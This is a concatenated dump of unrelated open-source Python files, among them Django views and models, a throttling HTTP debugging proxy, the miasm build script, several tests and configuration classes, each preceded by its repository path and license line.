# noinspection PyMethodMayBeStatic, PyUnusedLocal
def visit_Index(self, _: Index, *args, **kwargs):
return IntervalLattice().top()
def visit_BinaryArithmeticOperation(self, expr: BinaryArithmeticOperation, *args, **kwargs):
l =
|
tylertian/Openstack | openstack F/glance/glance/__init__.py | Python | apache-2.0 | 733 | 0 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010-2011 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import gettext
gettext.install('glance', unicode=1)
|
Bringing-Buzzwords-Home/bringing_buzzwords_home | visualize/views.py | Python | mit | 8,056 | 0.005462 |
import operator
import json
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse, HttpResponseRedirect
from .models import County, GuardianCounted, Geo, Item, Station, Crime, State
from .utilities import states, get_dollars_donated_by_year, format_money
from .utilities import get_state_deaths, get_state_deaths_over_time, make_state_categories
from .utilities import get_state_violent_crime, get_county_deaths, create_counties_list
from .utilities import create_county_crime, make_per_capita_guns, state_abbrev
from .utilities import get_categories_per_capita, format_integer, get_state_property_crime
from .utilities import get_prop_crime_data, get_prop_crime_data_per_cap, format_float
from .utilities import get_viol_crime_data, get_viol_crime_data_per_cap, get_fatal_encounters
from .utilities import get_fatal_encounters_per_cap, get_military_value
from .utilities import get_military_value_per_cap
from rest_framework import viewsets
from .serializers import StateSerializer
from django.db.models import Sum, Func, Count, F
from nvd3 import *
from django.utils.safestring import mark_safe
class StateViewSet(viewsets.ReadOnlyModelViewSet):
queryset = State.objects.all().order_by('state')
serializer_class = StateSerializer
def index(request):
state_list = sorted(states.items(), key=operator.itemgetter(1))
context = {'states': state_list}
return render(request, "visualize/index.html", context)
def state(request, state):
state = state.upper()
state_obj = get_object_or_404(State, state=state)
state_deaths = get_state_deaths(state)
category_data, categories = make_state_categories(state)
ten_thirty_three_total = Item.objects.filter(state=state).aggregate(Sum('Total_Value'))['Total_Value__sum']
twenty_fifteen_kills = GuardianCounted.objects.filter(state=state).count()
twenty_fifteen_population = County.objects.filter(state=states[state]).aggregate(Sum('pop_est_2015'))['pop_est_2015__sum']
context = {'state': state,
'state_num': state_deaths['2015 {} Fatal Encounters'.format(states[state])],
'average': state_deaths['2015 Average Fatal Encounters'],
'long_state_name': states[state],
'counties_list': create_counties_list(state),
'categories': categories,
'twenty_fourteen_violent': format_integer(state_obj.total_violent_crime),
'twenty_fourteen_property': format_integer(state_obj.total_property_crime),
'twenty_fifteen_kills': str(twenty_fifteen_kills),
'ten_thirty_three_total': format_money(ten_thirty_three_total),
'twenty_fifteen_population': format_integer(twenty_fifteen_population),
}
return render(request, "visualize/state.html", context)
def state_json(request, state):
state = state.upper()
state_obj = get_object_or_404(State, state=state)
state_deaths = get_state_deaths(state)
category_data, category_nums = make_state_categories(state)
per_capita_guns, per_capita_nums = make_per_capita_guns(state)
avg_violent_crime, per_capita_violent_crime = get_state_violent_crime(state_obj)
avg_property_crime, per_capita_property_crime = get_state_property_crime(state_obj)
data = {'state_deaths': [dict(key='State Deaths', values=[dict(label=key, value=value) for key, value in state_deaths.items()])],
'deaths_over_time': get_state_deaths_over_time(state),
'category_data': category_data,
'categories_per_capita': get_categories_per_capita(state, category_data),
'dollars_by_year': get_dollars_donated_by_year(state),
'avg_violent_crime': avg_violent_crime,
'per_capita_violent_crime': per_capita_violent_crime,
'per_capita_rifles': per_capita_guns,
'per_capita_nums': per_capita_nums,
'category_nums': category_nums,
'avg_property_crime': avg_property_crime,
'per_capita_property_crime': per_capita_property_crime}
return HttpResponse(json.dumps(data), content_type='application/json')
def county(request, county):
county_obj = County.objects.get(id=county)
total_num_counties_in_country = 3112
state = state_abbrev[county_obj.state]
state_obj = State.objects.get(state=state)
num_counties_in_state = len(County.objects.filter(state=county_obj.state))
county_pop = county_obj.pop_est_2015
state_pop = (State.objects.get(state=state)).total_population_twentyfifteen
us_population = State.objects.all().aggregate(Sum('total_population_twentyfifteen'))['total_population_twentyfifteen__sum']
county_violent = int(Crime.objects.filter(year='2014-01-01', county=county).aggregate(Sum('violent_crime'))['violent_crime__sum'])
county_property = int(Crime.objects.filter(year='2014-01-01', county=county).aggregate(Sum('property_crime'))['property_crime__sum'])
county_military_value = int(Item.objects.filter(county=county).aggregate(Sum('Total_Value'))['Total_Value__sum'])
county_fatal_encounters = int(GuardianCounted.objects.filter(county=county, date__year=2015).count())
county_crime = [county_violent, county_property]
average_state_crime_prop = get_prop_crime_data(state, county_obj, total_num_counties_in_country,
state_obj, num_counties_in_state, county)
average_state_crime_prop_per_cap = get_prop_crime_data_per_cap(
county_property, state, county_obj, us_population,
state_pop, county_pop, state_obj)
average_state_crime_viol = get_viol_crime_data(state, county_obj, total_num_counties_in_country,
state_obj, num_counties_in_state, county)
average_state_crime_viol_per_cap = get_viol_crime_data_per_cap(
county_violent, state, county_obj, us_population,
state_pop, county_pop, state_obj)
average_fatal_encounters = get_fatal_encounters(state, county_obj, total_num_counties_in_country,
state_obj, num_counties_in_state, county)
average_fatal_encounters_per_cap = get_fatal_encounters_per_cap(county_fatal_encounters, us_population,
state_pop, state, county_obj, state_obj, county_pop)
average_military_value = get_military_value(state, county_obj, total_num_counties_in_country,
state_obj, num_counties_in_state, county)
average_military_value_per_cap = get_military_value_per_cap(us_population, state_pop, county_pop,
county_military_value, state_obj, county_obj, state)
context = {
'military_value': mark_safe(json.dumps(average_military_value)),
'military_value_per_cap': mark_safe(json.dumps(average_military_value_per_cap)),
'prop_crime': mark_safe(json.dumps(average_state_crime_prop)),
"prop_crime_per_cap": mark_safe(json.dumps(average_state_crime_prop_per_cap)),
'viol_crime': mark_safe(json.dumps(average_state_crime_viol)),
"viol_crime_per_cap": mark_safe(json.dumps(average_state_crime_viol_per_cap)),
'average_fatal_encounters': mark_safe(json.dumps(average_fatal_encounters)),
'average_fatal_encounters_per_cap': mark_safe(json.dumps(average_fatal_encounters_per_cap)),
'county': county,
'county_obj': county_obj,
'twenty_fourteen_violent': format_integer(county_violent),
'twenty_fourteen_property': format_integer(county_property),
'twenty_fifteen_kills': format_integer(county_fatal_encounters),
'ten_thirty_three_total': format_money(county_military_value),
'counties_list': create_counties_list(state),
'county_pop_twenty_fifteen': format_integer(county_obj.pop_est_2015),
'state_abbrev': state,
}
return render(request, "visualize/county.html", context)
def about(request):
return render(request, "visualize/about.html")
|
gallandarakhneorg/autolatex | src/autolatex2/cli/commands/showconfigfiles.py | Python | lgpl-3.0 | 2,465 | 0.017039 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright (C) 1998-2021 Stephane Galland <galland@arakhne.org>
#
# This program is free library; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or any later version.
#
# This library is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; see the file COPYING. If not,
# write to the Free Software Foundation, Inc., 59 Temple Place - Suite
# 330, Boston, MA 02111-1307, USA.
import os
import logging
from autolatex2.cli.main import AbstractMakerAction
from autolatex2.utils.extprint import eprint
import gettext
_T = gettext.gettext
class MakerAction(AbstractMakerAction):
id = 'showconfigfiles'
help = _T('Display the list of the detected configuration files that will be read by autolatex')
def run(self, args) -> bool:
'''
Callback for running the command.
:param args: the arguments.
:return: True to continue process. False to stop the process.
'''
system_path = self.configuration.systemConfigFile
if system_path is not None:
if os.path.isfile(system_path):
if os.access(system_path, os.R_OK):
eprint(system_path)
else:
logging.error(_T("%s (unreable)") % (system_path))
else:
logging.error(_T("%s (not found)") % (system_path))
user_path = self.configuration.userConfigFile
if user_path is not None:
if os.path.isfile(user_path):
if os.access(user_path, os.R_OK):
eprint(user_path)
else:
logging.error(_T("%s (unreadable)") % (user_path))
else:
logging.error(_T("%s (not found)") % (user_path))
document_directory = self.configuration.documentDirectory
if document_directory is None:
logging.error(_T("Cannot detect document directory"))
else:
doc_path = self.configuration.makeDocumentConfigFilename(document_directory)
if doc_path is not None:
if os.path.isfile(doc_path):
if os.access(doc_path, os.R_OK):
eprint(doc_path)
else:
logging.error(_T("%s (unreadable)") % (doc_path))
else:
logging.error(_T("%s (not found)") % (doc_path))
return True
|
DHLabs/keep | keep_backend/organizations/models.py | Python | mit | 2,600 | 0.018846 |
import hashlib
from django.contrib.auth.models import Group
from django.db import models
USER_MODEL = 'auth.User'
class Organization( Group ):
'''
Umbrella object with which users are associated.
An organization can have multiple users.
'''
gravatar = models.EmailField( blank=True )
owner = models.ForeignKey( USER_MODEL )
users = models.ManyToManyField( USER_MODEL,
through='OrganizationUser',
related_name='organization_users' )
class Meta:
ordering = [ 'name' ]
verbose_name = 'organization'
verbose_name_plural = 'organizations'
def __unicode__( self ):
return self.name
def icon( self ):
if len( self.gravatar ) == 0:
return '//gravatar.com/avatar/0000000000000000000000000000000?d=mm'
m = hashlib.md5()
m.update( self.gravatar.strip().lower() )
return '//gravatar.com/avatar/%s' % ( m.hexdigest() )
def add_user( self, user ):
'''
Add a ( pending ) user to this organization.
'''
pending_user = OrganizationUser( user=user,
organization=self,
pending=True,
is_admin=False )
pending_user.save()
return pending_user
def has_user( self, user ):
org_user = OrganizationUser.objects.filter( user=user,
organization=self )
return len( org_user ) > 0
class OrganizationUser( models.Model ):
'''
ManyToMany through field relating Users to Organizations
Since it is possible for a User to be a member of multiple orgs this
class relates the OrganizationUser to the User model using a ForeignKey
relationship, rather than a OneToOne relationship.
'''
user = models.ForeignKey( USER_MODEL,
related_name='organization_user' )
organization = models.ForeignKey( Organization,
related_name='organization_user' )
pending = models.BooleanField( default=True )
is_admin = models.BooleanField( default=False )
class Meta:
ordering = [ 'organization', 'user' ]
unique_together = ( 'user', 'organization' )
verbose_name = 'organization user'
verbose_name_plural = 'organization users'
def __unicode__( self ):
return '%s ( %s )' % ( self.user.username, self.organization.name )
|
pypa/virtualenv | tests/unit/activation/test_nushell.py | Python | mit | 816 | 0.001225 |
from __future__ import absolute_import, unicode_literals
import sys
if sys.version_info > (3,):
from shutil import which
else:
from distutils.spawn import find_executable as which
from virtualenv.activation import NushellActivator
from virtualenv.info import IS_WIN
def test_nushell(activation_tester_class, activation_tester):
class Nushell(activation_tester_class):
def __init__(self, session):
cmd = which("nu")
if cmd is None and IS_WIN:
cmd = "c:\\program files\\nu\\bin\\nu.exe"
super(Nushell, self).__init__(NushellActivator, session, cmd, "activate.nu", "nu")
self.unix_line_ending = not IS_WIN
def print_prompt(self):
return r"echo $virtual_prompt; printf '\n'"
activation_tester(Nushell)
|
foligny/browsershots-psycopg2 | throxy/throxy.py | Python | gpl-3.0 | 19,293 | 0.001451 |
#! /usr/bin/env python
# throxy.py - HTTP proxy to simulate dial-up access
# Copyright (c) 2007 Johann C. Rocholl <johann@browsershots.org>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
Throxy: throttling HTTP proxy in one Python file
To use it, run this script on your local machine and adjust your
browser settings to use 127.0.0.1:8080 as HTTP proxy.
* Simulate a slow connection (like dial-up).
* Adjustable bandwidth limit for download and upload.
* Optionally dump HTTP headers and content for debugging.
* Decompress gzip content encoding for debugging.
* Multiple connections, without threads (uses asyncore).
* Only one source file, written in pure Python.
Simulate analog modem connection:
$ python throxy.py -u28.8 -d57.6
Show all HTTP headers (request & reply):
$ python throxy.py -qrs
Dump HTTP headers and content to a file, without size limits:
$ python throxy.py -rsRS -l0 -L0 -g0 > dump.txt
Tell command line tools to use the proxy:
$ export http_proxy=127.0.0.1:8080
"""
import sys
import asyncore
import socket
import time
import gzip
import struct
import cStringIO
import re
__revision__ = '$Rev: 1180 $'
KILO = 1000 # decimal or binary kilo
request_match = re.compile(r'^([A-Z]+) (\S+) (HTTP/\S+)$').match
def debug(message, newline=True):
"""Print message to stderr and clear the rest of the line."""
if options.quiet:
return
if newline:
message = message.ljust(79) + '\n'
sys.stderr.write(message)
class Header:
"""HTTP (request or reply) header parser."""
def __init__(self):
self.data = ''
self.lines = []
self.complete = False
def append(self, new_data):
"""
Add more data to the header.
Any data after the end of the header is returned, as it may
contain content, or even the start of the next request.
"""
self.data += new_data
while not self.complete:
newline = self.data.find('\n')
if newline < 0:
break # No complete line found
line = self.data[:newline].rstrip('\r')
if len(line):
self.lines.append(line)
else:
self.complete = True
self.content_type = self.extract('Content-Type')
self.content_encoding = self.extract('Content-Encoding')
if self.content_encoding == 'gzip':
self.gzip_data = cStringIO.StringIO()
self.data = self.data[newline+1:]
if self.complete:
rest = self.data
self.data = ''
return rest
else:
return ''
def extract(self, name, default=''):
"""Extract a header field."""
name = name.lower()
for line in self.lines:
if not line.count(':'):
continue
key, value = line.split(':', 1)
if key.lower() == name:
return value.strip()
return default
def extract_host(self):
"""Extract host and perform DNS lookup."""
self.host = self.extract('Host')
if self.host is None:
return
if self.host.count(':'):
self.host_name, self.host_port = self.host.split(':')
self.host_port = int(self.host_port)
else:
self.host_name = self.host
self.host_port = 80
self.host_ip = socket.gethostbyname(self.host_name)
self.host_addr = (self.host_ip, self.host_port)
def extract_request(self):
"""Extract path from HTTP request."""
match = request_match(self.lines[0])
if not match:
raise ValueError("malformed request line " + self.lines[0])
self.method, self.url, self.proto = match.groups()
if self.method.upper() == 'CONNECT':
raise ValueError("method CONNECT is not supported")
prefix = 'http://' + self.host
if not self.url.startswith(prefix):
raise ValueError("URL doesn't start with " + prefix)
self.path = self.url[len(prefix):]
def dump_title(self, from_addr, to_addr, direction, what):
"""Print a title before dumping headers or content."""
print '==== %s %s (%s:%d => %s:%d) ====' % (
direction, what,
from_addr[0], from_addr[1],
to_addr[0], to_addr[1])
def dump(self, from_addr, to_addr, direction='sending'):
"""Dump header lines to stdout."""
self.dump_title(from_addr, to_addr, direction, 'headers')
print '\n'.join(self.lines)
print
def dump_content(self, content, from_addr, to_addr, direction='sending'):
"""Dump content to stdout."""
self.dump_title(from_addr, to_addr, direction, 'content')
if self.content_encoding:
print "(%d bytes of %s with %s encoding)" % (len(content),
repr(self.content_type), repr(self.content_encoding))
else:
print "(%d bytes of %s)" % (len(content), repr(self.content_type))
if self.content_encoding == 'gzip':
if options.gzip_size_limit == 0 or \
self.gzip_data.tell() < options.gzip_size_limit:
self.gzip_data.write(content)
try:
content = self.gunzip()
except IOError, error:
content = 'Could not gunzip: ' + str(error)
if self.content_type.startswith('text/'):
limit = options.text_dump_limit
elif self.content_type.startswith('application/') and \
self.content_type.count('xml'):
limit = options.text_dump_limit
else:
limit = options.data_dump_limit
content = repr(content)
if len(content) < limit or limit == 0:
print content
else:
print content[:limit] + '(showing only %d bytes)' % limit
print
def gunzip(self):
"""Decompress gzip content."""
if options.gzip_size_limit and \
self.gzip_data.tell() > options.gzip_size_limit:
raise IOError("More than %d bytes" % options.gzip_size_limit)
self.gzip_data.seek(0) # Seek to start of data
try:
gzip_file = gzip.GzipFile(
fileobj=self.gzip_data, mode='rb')
result = gzip_file.read()
gzip_file.close()
except struct.error:
raise IOError("Caught struct.error from gzip module")
self.gzip_data.seek(0, 2) # Seek to end of data
return result
class Throttle:
"""Bandwidth limit tracker."""
def __init__(self, kbps, interval=1.0):
self.bytes_per_second = int(kbps * KILO) / 8
self.interval = interval
self.fragment_size = min(512, self.bytes_per_second / 4)
self.transmit_log = []
self.weighted_throughput = 0.0
self.real_throughput = 0
self.last_updated = time.time()
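# Example: a 57.6 kbps limit (the dial-up value from the module docstring) gives
# int(57.6 * 1000) / 8 = 7200 bytes per second, and fragment_size = min(512, 1800) = 512.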
def update_throughput(self, now):
"""Update weighted and real throughput."""
self.weighted_throughput = 0.0
self.real_throughput = 0
for timestamp, bytes in self.transmit_log
|
jaesivsm/pyAggr3g470r | jarr/controllers/abstract.py | Python | agpl-3.0 | 5,796 | 0.000173 |
import logging
from datetime import timezone
import dateutil.parser
from sqlalchemy import and_, or_
from werkzeug.exceptions import Forbidden, NotFound, Unauthorized
from jarr.bootstrap import Base, session
logger = logging.getLogger(__name__)
def cast_to_utc(dt_obj):
dt_obj = dateutil.parser.parse(dt_obj)
if not dt_obj.tzinfo:
return dt_obj.replace(tzinfo=timezone.utc)
return dt_obj
class AbstractController:
_db_cls = Base # reference to the database class, to redefine in child cls
_user_id_key = 'user_id'
def __init__(self, user_id=None, ignore_context=False):
"""
Base methods for controllers accross JARR.
User id is a right management mechanism that should be used to
filter objects in database on their denormalized "user_id" field
(or "id" field for users).
Should no user_id be provided, the Controller won't apply any filter
allowing for a kind of "super user" mode.
"""
if self._db_cls is None:
raise NotImplementedError("%r _db_cls isn't overridden" % self)
try:
self.user_id = int(user_id)
except TypeError:
self.user_id = user_id
@staticmethod
def _to_comparison(key, model):
"""Extract from the key the method used by sqla for comparison."""
if '__' not in key:
return getattr(model, key).__eq__
attr, ope = key.rsplit('__', 1)
if ope == 'nin':
return getattr(model, attr).notin_
if ope == 'in':
return getattr(model, attr).in_
if ope not in {'like', 'ilike'}:
ope = '__%s__' % ope
return getattr(getattr(model, attr), ope)
@classmethod
def _to_filters(cls, **filters):
"""
Will translate filters to sqlalchemy filter.
This method will also apply user_id restriction if available.
each parameters of the function is treated as an equality unless the
name of the parameter ends with either "__gt", "__lt", "__ge", "__le",
"__ne", "__in", "__like" or "__ilike".
"""
db_filters = set()
for key, value in filters.items():
if key == '__or__':
db_filters.add(or_(*[and_(*cls._to_filters(**sub_filter))
for sub_filter in value]))
elif key == '__and__':
for sub_filter in value:
for k, v in sub_filter.items():
db_filters.add(cls._to_comparison(k, cls._db_cls)(v))
else:
db_filters.add(cls._to_comparison(key, cls._db_cls)(value))
return db_filters
def _get(self, **filters):
"""
Abstract get.
        Will add the current user id to the filters if it is not None (in which
        case the decision has been made in the code that the query shouldn't be
        user dependent), if the user is not an admin, and if the filters don't
        already contain a filter for that user.
"""
if self._user_id_key is not None and self.user_id \
and filters.get(self._user_id_key) != self.user_id:
filters[self._user_id_key] = self.user_id
return session.query(self._db_cls).filter(*self._to_filters(**filters))
def get(self, **filters):
"""Will return one single objects corresponding to filters"""
obj = self._get(**filters).first()
if obj and not self._has_right_on(obj):
            raise Forbidden('Not authorized to access %r (%r)' % (
self._db_cls.__class__.__name__, filters))
if not obj:
raise NotFound('No %r (%r)' % (self._db_cls.__class__.__name__,
filters))
return obj
def create(self, **attrs):
if not attrs:
raise ValueError("attributes to update must not be empty")
if self._user_id_key is not None and self._user_id_key not in attrs:
attrs[self._user_id_key] = self.user_id
if not (self._user_id_key is None or self._user_id_key in attrs
or self.user_id is None):
raise Unauthorized("You must provide user_id one way or another")
obj = self._db_cls(**attrs)
session.add(obj)
session.flush()
session.commit()
return obj
def read(self, **filters):
return self._get(**filters)
def update(self, filters, attrs, return_objs=False, commit=True):
if not attrs:
logger.error("nothing to update, doing nothing")
result, commit = {}, False
else:
result = self._get(**filters).update(attrs,
synchronize_session=False)
if commit:
session.flush()
session.commit()
if return_objs:
return self._get(**filters)
return result
def delete(self, obj_id, commit=True):
obj = self.get(id=obj_id)
session.delete(obj)
if commit:
session.flush()
session.commit()
return obj
def _has_right_on(self, obj):
# user_id == None is like being admin
if self._user_id_key is None:
return True
return self.user_id is None \
or getattr(obj, self._user_id_key, None) == self.user_id
def assert_right_ok(s
|
elf, obj_id):
if not self.user_id:
raise ValueError("%r user_id can't be None" % self)
rows = self.__
|
class__().read(id=obj_id).with_entities(
getattr(self._db_cls, self._user_id_key)).first()
if not rows:
raise NotFound()
if not rows[0] == self.user_id:
raise Forbidden()
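# Usage sketch (not part of the original module): how the "__"-suffix filter
# convention handled by _to_comparison()/_to_filters() is typically exercised.
# The Article model and the controller subclass below are illustrative
# assumptions, not part of the code shown above.
#
# class ArticleController(AbstractController):
#     _db_cls = Article  # SQLAlchemy model with a denormalized "user_id" column
#
# ctrl = ArticleController(user_id=1)
# ctrl.read(title__ilike='%python%', date__gt=some_date)  # _get() adds user_id == 1
# ctrl.update({'id__in': [1, 2, 3]}, {'read': True})      # bulk update through _to_filters()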
|
chubbymaggie/miasm
|
setup.py
|
Python
|
gpl-2.0
| 6,252 | 0.006718 |
#! /usr/bin/env python
from distutils.core import setup, Extension
from distutils.util import get_platform
import shutil
import os, sys
def build_all():
packages=['miasm2',
'miasm2/arch',
'miasm2/arch/x86',
'miasm2/arch/arm',
'miasm2/arch/aarch64',
'miasm2/arch/msp430',
'miasm2/arch/sh4',
'miasm2/arch/mips32',
'miasm2/core',
'miasm2/expression',
'miasm2/ir',
'miasm2/ir/translators',
'miasm2/analysis',
'miasm2/os_dep',
'miasm2/jitter',
'miasm2/jitter/arch',
'miasm2/jitter/loader',
]
ext_modules_no_tcc = [
Extension("miasm2.jitter.VmMngr",
["miasm2/jitter/vm_mngr.c",
"miasm2/jitter/vm_mngr_py.c"]),
Extension("miasm2.jitter.arch.JitCore_x86",
["miasm2/jitter/JitCore.c",
"miasm2/jitter/vm_mngr.c",
"miasm2/jitter/arch/JitCore_x86.c"]),
Extension("miasm2.jitter.arch.JitCore_arm",
["miasm2/jitter/JitCore.c",
"miasm2/jitter/vm_mngr.c",
"miasm2/jitter/arch/JitCore_arm.c"]),
Extension("miasm2.jitter.arch.JitCore_aarch64",
["miasm2/jitter/JitCore.c",
"miasm2/jitter/vm_mngr.c",
"miasm2/jitter/arch/JitCore_aarch64.c"]),
Extension("miasm2.jitter.arch.JitCore_msp430",
["miasm2/jitter/JitCore.c",
"miasm2/jitter/vm_mngr.c",
"miasm2/jitter/arch/JitCore_msp430.c"]),
Extension("miasm2.jitter.arch.JitCore_mips32",
["miasm2/jitter/JitCore.c",
"miasm2/jitter/vm_mngr.c",
"miasm2/jitter/arch/JitCore_mips32.c"]),
Extension("miasm2.jitter.Jitgcc",
["miasm2/jitter/Jitgcc.c"]),
Extension("miasm2.jitter.Jitllvm",
["miasm2/jitter/Jitllvm.c"]),
]
ext_modules_all = [
Extension("miasm2.jitter.VmMngr",
["miasm2/jitter/vm_mngr.c",
"miasm2/jitter/vm_mngr_py.c"]),
Extension("miasm2.jitter.arch.JitCore_x86",
["miasm2/jitter/JitCore.c",
"miasm2/jitter/vm_mngr.c",
"miasm2/jitter/arch/JitCore_x86.c"]),
Extension("miasm2.jitter.arch.JitCore_arm",
["miasm2/jitter/JitCore.c",
"miasm2/jitter/vm_mngr.c",
"miasm2/jitter/arch/JitCore_arm.c"]),
Extension("miasm2.jitter.arch.JitCore_aarch64",
["miasm2/jitter/JitCore.c",
"miasm2/jitter/vm_mngr.c",
"miasm2/jitter/arch/JitCore_aarch64.c"]),
Extension("miasm2.jitter.arch.JitCore_msp430",
["miasm2/jitter/JitCore.c",
"miasm2/jitter/vm_mngr.c",
"miasm2/jitter/arch/JitCore_msp430.c"]),
Extension("miasm2.jitter.arch.JitCore_mips32",
["miasm2/jitter/JitCore.c",
"miasm2/jitter/vm_mngr.c",
"miasm2/jitter/arch/JitCore_mips32.c"]),
Extension("miasm2.jitter.Jitllvm",
["miasm2/jitter/Jitllvm.c"]),
Extension("miasm2.jitter.Jitgcc",
["miasm2/jitter/Jitgcc.c"]),
Extension("miasm2.jitter.Jittcc",
["miasm2/jitter/Jittcc.c"],
libraries=["tcc"])
]
print 'building'
build_ok = False
for name, ext_modules in [('all', ext_modules_all),
('notcc', ext_modules_no_tcc)]:
print 'build with', repr(name)
try:
s = setup(
name = 'Miasm',
version = '2.0',
packages = packages,
package_data = {'miasm2':['jitter/*.h',
'jitter/arch/*.h',]},
ext_modules = ext_modules,
# Metadata
author = 'Fabrice Desclaux',
author_email = 'serpilliere@droid-corp.org',
description = 'Machine code manipulation library',
license = 'GPLv2',
# keywords = '',
# url = '',
)
except SystemExit, e:
print repr(e)
continue
build_ok = True
break
if not build_ok:
raise ValueError('Unable to build Miasm!')
print 'build', name
if name == 'notcc':
print
print "*"*80
print "Warning: TCC is not properly installed,"
print "Miasm will be installed without TCC Jitter"
print "Etheir install TCC or use LLVM jitter"
print "*"*80
print
# we copy libraries from build dir to current miasm directory
build_base = None
if 'build' in s.command_options:
if 'build_base' in s.command_options['build']:
build_base = s.command_options['build']['build_base']
if build_base is None:
build_base = "build"
plat_specifier = ".%s-%s" % (get_platform(), sys.version[0:3])
build_base = os.path.join('build','lib' + plat_specifier)
print build_base
def build_no_tcc():
setup(
name = 'Miasm',
version = '2.0',
packages=['miasm2', 'miasm2/tools',
'miasm2/expression', 'miasm2/graph', 'miasm2/arch',
'miasm2/core', 'miasm2/tools/emul_lib' ],
package_data = {'miasm2':['tools/emul_lib/*.h']}
|
,
# data_files = [('toto', ['miasm2/tools/emul_lib/queue.h'])],
# Metadata
author = 'Fabrice Desclaux',
author_email = 'serpilliere@droid-corp.org',
description = 'Machine code manipulation library',
license = 'GPLv2',
# keywords = '',
# url = '',
)
def try_build():
    build_all()
"""
try:
        build_all()
return
except:
print "WARNING cannot
|
build with libtcc!, trying without it"
print "Miasm will not be able to emulate code"
        build_no_tcc()
"""
try_build()
|
NavarraBiomed/seguimientoPacientes
|
ictus/migrations/0029_auto_20161212_1316.py
|
Python
|
gpl-2.0
| 852 | 0.00235 |
# -*- cod
|
ing: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('ictus', '0028_auto_20161212_1316'),
]
operations = [
migrations.A
|
lterField(
model_name='basal',
name='alcohol',
field=models.IntegerField(null=True, choices=[('00', 'No'), ('01', 'A diario'), ('02', 'Ocasionalmente'), ('03', 'Exhabito enólico')], blank=True, verbose_name='Alcohol'),
),
migrations.AlterField(
model_name='basal',
name='tabaquismo',
field=models.IntegerField(null=True, choices=[('00', 'No fumador'), ('01', 'Exfumador'), ('02', 'Fumador pasivo'), ('03', 'Fumador actual'), ('04', 'Desconocido')], blank=True, verbose_name='Tabaco'),
),
]
|
LastAvenger/labots
|
labots/common/message.py
|
Python
|
gpl-3.0
| 223 | 0.004484 |
fr
|
om typing import List
class Message(object):
class Origin(object):
servername: str
nickname: str
username: str
hostname: str
command: str
|
origin: Origin
params: List[str]
|
zstackio/zstack-woodpecker
|
integrationtest/vm/e2e_mini/volume/test_volume_backup.py
|
Python
|
apache-2.0
| 1,389 | 0.00432 |
# -*- coding:utf-8 -*-
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_lib as test_lib
volume = test_lib.lib_get_specific_stub('e2e_mini/volume', 'volume')
volume_ops = None
vm_ops = None
volume_name = 'volume-' + volume.get_time_postfix()
backup_name = 'backup-' + volume.get_time_postfix()
def test():
global volume_ops
volume_ops = volume.VOLUME()
vm = test_lib.lib_get_specific_stub(suite_name='e2e_mini/vm', specific_name='vm')
vm_ops = vm.VM(uri=volume_op
|
s.uri, initialized=True)
vm_ops.create_vm()
volume_ops.create_volume(volume_name)
volume_ops.volume_attach_to_vm(vm_ops.vm_name)
volume_ops.create_backup(volume_na
|
me, 'volume', backup_name)
vm_ops.vm_ops(vm_ops.vm_name, action='stop')
volume_ops.restore_backup(volume_name, 'volume', backup_name)
volume_ops.delete_backup(volume_name, 'volume', backup_name)
volume_ops.check_browser_console_log()
test_util.test_pass('Test Volume Create, Restore and Delete Backups Successful')
def env_recover():
global volume_ops
vm_ops.expunge_vm()
volume_ops.expunge_volume(volume_name)
volume_ops.close()
#Will be called only if exception happens in test().
def error_cleanup():
global volume_ops
try:
vm_ops.expunge_vm()
volume_ops.expunge_volume(volume_name)
volume_ops.close()
except:
pass
|
Sotera/aggregate-micro-paths
|
hive-streaming/conf/config.py
|
Python
|
apache-2.0
| 3,321 | 0.016561 |
# Copyright
|
2016 Sotera Defense Solutions Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License fo
|
r the specific language governing permissions and
# limitations under the License.
import math
import six
if six.PY2:
from ConfigParser import SafeConfigParser
else:
from configparser import SafeConfigParser
class AggregateMicroPathConfig:
config_file = ""
table_name = ""
table_schema_id = ""
table_schema_dt = ""
table_schema_lat = ""
table_schema_lon = ""
time_filter = 0
distance_filter = 0
tripLat1 = 0
tripLon1 = 0
tripLat2 = 0
tripLon2 = 0
tripname = ""
resolutionLat = 0
resolutionLon = 0
tripLatMin = 0
tripLatMax = 0
